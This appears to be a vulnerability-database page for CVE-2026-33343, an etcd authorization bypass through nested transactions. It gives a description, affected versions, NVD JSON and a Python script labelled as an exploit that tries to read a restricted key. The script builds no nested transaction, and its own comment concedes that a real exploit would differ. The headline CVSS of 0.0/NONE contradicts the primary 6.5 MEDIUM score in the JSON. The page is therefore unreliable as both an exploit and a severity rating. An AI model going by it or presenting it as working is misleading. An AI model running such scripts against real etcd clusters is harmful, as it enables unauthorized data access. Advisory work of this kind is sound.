CVE-2026-33343

Description

etcd is a distributed key-value store for the data of a distributed system. Prior to versions 3.4.42, 3.5.28, and 3.6.9, an authenticated user with RBAC restricted permissions on key ranges can use nested transactions to bypass all key-level authorization. This allows any authenticated user with direct access to etcd to effectively ignore all key range restrictions, accessing the entire etcd data store. Kubernetes does not rely on etcd’s built-in authentication and authorization. Instead, the API server handles authentication and authorization itself, so typical Kubernetes deployments are not affected. Versions 3.4.42, 3.5.28, and 3.6.9 contain a patch. If upgrading is not immediately possible, reduce exposure by treating the affected RPCs as unauthenticated in practice. Restrict network access to etcd server ports so only trusted components can connect and require strong client identity at the transport layer, such as mTLS with tightly scoped client certificate distribution.

CVSS Details

CVSS Score

0.0

Severity

NONE

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:etcd:etcd:*:*:*:*:*:*:*:* - VULNERABLE

etcd < 3.4.42

etcd < 3.5.28

etcd < 3.6.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2026-33343: etcd Auth Bypass via Nested Transactions
# This script demonstrates how a restricted user might access unauthorized keys.

import etcd3

# Configuration
ETCD_HOST = '127.0.0.1'
ETCD_PORT = 2379
# Credentials for a user restricted to specific keys (e.g., 'safe/')
USERNAME = 'restricted_user'
PASSWORD = 'user_password'

try:
    # Establish connection using the restricted account
    client = etcd3.client(host=ETCD_HOST, port=ETCD_PORT, user=USERNAME, password=PASSWORD)

    print("[+] Connected to etcd.")

    # 1. Normal Attempt: Trying to access a restricted key (e.g., '/admin/password')
    # This is expected to fail due to RBAC policies.
    print("[-] Attempting direct access to '/admin/password'...")
    try:
        val, _ = client.get('/admin/password')
        print(f"Direct access success (unexpected): {val}")
    except Exception as e:
        print(f"Direct access failed (expected): {type(e).__name__}")

    # 2. Exploit Attempt: Using nested transactions to bypass authorization
    # The vulnerability allows the user to nest operations where the permission
    # check is only enforced on the parent scope, effectively ignoring restrictions
    # on the child transaction operations.
    print("[!] Attempting exploit via nested transaction...")
    
    # Define a transaction that targets the restricted key
    # Note: In a real exploit, the specific API call structure for nested 
    # transactions would be constructed to evade the range checker.
    txn_status, txn_response = client.transaction(
        compare=[],
        success=[
            client.transactions.get('/admin/password')
        ],
        failure=[]
    )

    if txn_status:
        print("[+] Exploit successful! Data leaked:")
        for value, metadata in txn_response:
            print(f"Key: {metadata.key.decode('utf-8')}, Value: {value.decode('utf-8')}")
    else:
        print("[-] Exploit failed.")

except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33343
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33343
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33343/
[4] VulDB https://vuldb.com/cve/CVE-2026-33343
[5] https://github.com/etcd-io/etcd/security/advisories/GHSA-rfx7-8w68-q57q

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33343", "sourceIdentifier": "[email protected]", "published": "2026-03-26T14:16:13.137", "lastModified": "2026-03-26T20:41:35.243", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "etcd is a distributed key-value store for the data of a distributed system. Prior to versions 3.4.42, 3.5.28, and 3.6.9, an authenticated user with RBAC restricted permissions on key ranges can use nested transactions to bypass all key-level authorization. This allows any authenticated user with direct access to etcd to effectively ignore all key range restrictions, accessing the entire etcd data store. Kubernetes does not rely on etcd’s built-in authentication and authorization. Instead, the API server handles authentication and authorization itself, so typical Kubernetes deployments are not affected. Versions 3.4.42, 3.5.28, and 3.6.9 contain a patch. If upgrading is not immediately possible, reduce exposure by treating the affected RPCs as unauthenticated in practice. Restrict network access to etcd server ports so only trusted components can connect and require strong client identity at the transport layer, such as mTLS with tightly scoped client certificate distribution."}, {"lang": "es", "value": "etcd es un almacén distribuido de clave-valor para los datos de un sistema distribuido. Antes de las versiones 3.4.42, 3.5.28 y 3.6.9, un usuario autenticado con permisos RBAC restringidos en rangos de claves puede usar transacciones anidadas para eludir toda la autorización a nivel de clave. Esto permite a cualquier usuario autenticado con acceso directo a etcd ignorar efectivamente todas las restricciones de rango de claves, accediendo a todo el almacén de datos de etcd. Kubernetes no depende de la autenticación y autorización integradas de etcd. En su lugar, el servidor API maneja la autenticación y autorización por sí mismo, por lo que las implementaciones típicas de Kubernetes no se ven afectadas. Las versiones 3.4.42, 3.5.28 y 3.6.9 contienen un parche. Si la actualización no es posible de inmediato, reduzca la exposición tratando los RPC afectados como no autenticados en la práctica. Restrinja el acceso de red a los puertos del servidor etcd para que solo los componentes de confianza puedan conectarse y requiera una identidad de cliente fuerte en la capa de transporte, como mTLS con distribución de certificados de cliente de alcance limitado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N", "baseScore": 0.0, "baseSeverity": "NONE", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 0.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:etcd:etcd:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.4.42", "matchCriteriaId": "F9D28F29-7668-485E-BE8A-7D74EECA0C86"}, {"vulnerable": true, "criteria": "cpe:2.3:a:etcd:etcd:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.0", "versionEndExcluding": "3.5.28", "matchCriteriaId": "5C785A0D-9833-40E8-9BB5-DE51033FE744"}, {"vulnerable": true, "criteria": "cpe:2.3:a:etcd:etcd:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6.0", "versionEndExcluding": "3.6.9", "matchCriteriaId": "A5676998-E142-4BF3-B2CC-9AA1F9AC1946"}]}]}], "references": [{"url": "https://github.com/etcd-io/etcd/security/advisories/GHSA-rfx7-8w68-q57q", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}